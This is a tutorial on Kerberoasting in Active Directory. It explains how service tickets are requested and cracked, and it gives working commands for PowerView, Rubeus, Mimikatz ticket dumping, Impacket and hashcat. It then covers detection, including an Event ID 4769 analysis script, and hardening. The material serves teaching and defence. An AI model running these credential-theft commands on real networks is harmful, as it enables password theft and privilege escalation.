
Kerberos - L1

Kerberos is a network authentication protocol designed to provide secure and encrypted authentication between users and services. It uses a ticket-based system to verify identities without transmitting passwords over the network. Developed by MIT, Kerberos is widely used in Windows Active Directory and other enterprise environments. It relies on a Key Distribution Center (KDC) to issue tickets, ensuring secure authentication and preventing credential theft through replay attacks.

What is Kerberoasting?
Kerberoasting is an attack that allows an attacker to extract Kerberos service tickets (TGS) from Active Directory (AD) and crack them offline to recover plaintext passwords of service accounts.
Why is this attack dangerous?
●    It does not require admin privileges—any domain user can request Kerberos tickets.

●    Service accounts often have weak passwords and high privileges.

●    Since the attack is offline, it does not generate authentication failures in logs.

________________________________________
How Kerberoasting Works (Step-by-Step)
Step 1: Attacker Gets a Valid Domain User Account
●    Any authenticated domain user can perform Kerberoasting.

●    The attacker does not need to be an admin.

Step 2: Request a Service Ticket (TGS) for a Service Account
●    The attacker queries Service Principal Names (SPNs) linked to service accounts.

●    SPNs are used by Kerberos to map services to user accounts.

Example Command to Find Service Accounts (PowerView)
Get-NetUser -SPN

Step 3: Extract Kerberos Tickets from Memory
●    The attacker requests a TGS ticket from the Domain Controller (DC).

●    The TGS ticket is encrypted with the NTLM hash of the service account’s password.

Example Command to Request TGS Tickets (Rubeus)
Rubeus.exe kerberoast /format:hashcat

Step 4: Crack the Ticket Offline to Reveal the Password
●    The attacker extracts the TGS hash and cracks it offline using hashcat or John the Ripper.

Example Hashcat Command (Cracking TGS Ticket)
hashcat -m 13100 <ticket_hash> rockyou.txt --force

Step 5: Use the Recovered Password for Privilege Escalation
●    If the service account has admin privileges, the attacker can move laterally or escalate privileges.

●    The attacker may perform Pass-the-Hash, DCSync, or Golden Ticket attacks.

________________________________________

Tools Used in Kerberoasting

Tool                        Usage
PowerView                   Enumerate service accounts with SPNs
Rubeus                      Request TGS tickets & extract hashes
Mimikatz                    Dump Kerberos tickets from memory
Impacket (GetUserSPNs.py)   Enumerate SPNs & extract tickets
Hashcat                     Crack TGS hashes offline
John the Ripper             Alternative for cracking hashes

________________________________________
Example Commands for Each Tool
1. PowerView (Find SPNs for Kerberoasting)
Get-NetUser -SPN

Finds service accounts with SPNs (targets for Kerberoasting).
________________________________________
2. Rubeus (Request TGS Tickets)
Rubeus.exe kerberoast /format:hashcat

Extracts service ticket hashes for offline cracking.
________________________________________
3. Mimikatz (Dump Kerberos Tickets)
privilege::debug
sekurlsa::tickets /export

Extracts Kerberos tickets from memory.
________________________________________
4. Impacket (Python Script for SPN Enumeration)
python3 GetUserSPNs.py -request DOMAIN/USER:PASSWORD@DC_IP

Lists all SPNs & requests their Kerberos tickets.
________________________________________
5. Crack the Hash with Hashcat
hashcat -m 13100 <ticket_hash> rockyou.txt --force

Uses dictionary attacks to recover plaintext passwords.
________________________________________
How to Detect & Prevent Kerberoasting
Detection (Blue Team)
●    Monitor Event ID 4769 (Kerberos service ticket requests) and flag tickets issued with RC4 encryption.

●    Look for multiple TGS requests from a single user (suspicious activity).

●    Use Sysmon + SIEM tools to track unusual Kerberos activity.
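
The two detection bullets above (RC4-encrypted 4769 events, and many service ticket requests from one user) can be combined into one rule. The script below is an added example, not part of the original lesson: it runs over a constructed batch of Event ID 4769 fields (requesting account, service name, ticket encryption type, status) and flags any non-machine account that obtained several distinct RC4 service tickets within a short window. The field layout, the five-minute window and the threshold of four tickets are assumptions to tune for your own environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Event ID 4769 fields (not real logs). Each tuple:
# (timestamp, requesting account, ServiceName, TicketEncryptionType, Status)
SAMPLE_4769 = [
    ("2024-05-01 09:00:01", "alice@CORP.LOCAL", "WS01$", "0x12", "0x0"),
    ("2024-05-01 09:00:05", "alice@CORP.LOCAL", "fileserver$", "0x12", "0x0"),
    ("2024-05-01 09:03:10", "bob@CORP.LOCAL", "svc_sql", "0x17", "0x0"),
    ("2024-05-01 09:03:11", "bob@CORP.LOCAL", "svc_web", "0x17", "0x0"),
    ("2024-05-01 09:03:12", "bob@CORP.LOCAL", "svc_backup", "0x17", "0x0"),
    ("2024-05-01 09:03:13", "bob@CORP.LOCAL", "svc_report", "0x17", "0x0"),
    ("2024-05-01 09:03:14", "bob@CORP.LOCAL", "svc_legacy", "0x17", "0x0"),
    ("2024-05-01 10:15:00", "carol@CORP.LOCAL", "svc_legacy", "0x17", "0x0"),
    ("2024-05-01 09:03:15", "DC01$@CORP.LOCAL", "krbtgt", "0x12", "0x0"),
]

RC4_HMAC = "0x17"          # TicketEncryptionType value for RC4-HMAC
WINDOW = timedelta(minutes=5)   # assumed correlation window
THRESHOLD = 4                   # assumed: distinct RC4 tickets per requester


def find_kerberoast_candidates(events, threshold=THRESHOLD, window=WINDOW):
    """Return {requester: sorted(services)} for accounts that obtained at least
    `threshold` distinct RC4-encrypted service tickets within `window`.
    Machine accounts (names ending in '$') and krbtgt tickets are skipped:
    hosts legitimately request many tickets, and the TGT path is not what
    a Kerberoasting request asks for."""
    per_user = defaultdict(list)
    for ts, requester, service, etype, status in events:
        if etype != RC4_HMAC or status != "0x0":
            continue  # only successful RC4 service tickets matter here
        if requester.split("@")[0].endswith("$") or service.lower() == "krbtgt":
            continue
        stamp = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
        per_user[requester].append((stamp, service))

    flagged = {}
    for requester, reqs in per_user.items():
        reqs.sort()  # oldest first
        for i, (start, _) in enumerate(reqs):
            # distinct services requested within `window` of this request
            in_window = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(in_window) >= threshold:
                flagged[requester] = sorted(in_window)
                break
    return flagged


if __name__ == "__main__":
    for user, services in find_kerberoast_candidates(SAMPLE_4769).items():
        print(f"possible Kerberoasting by {user}: {', '.join(services)}")
```

In a real deployment the tuples would come from the Security log on each domain controller, and accounts that legitimately use RC4 should be baselined before alerting on them.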

Prevention (Security Hardening)

●    Use strong, long passwords for service accounts (25+ characters).

●    Remove SPNs from high-privileged accounts (avoid linking them to Domain Admins).

●    Enable AES encryption for Kerberos (disabling RC4 makes the tickets harder to crack).

●    Monitor abnormal Kerberos ticket requests (detect mass SPN queries).

________________________________________
Summary
●    Kerberoasting targets service accounts in AD to extract TGS tickets and crack passwords offline.

●    Attackers need only a valid domain user to launch this attack.

●    Defenses include strong passwords, AES encryption, and log monitoring.
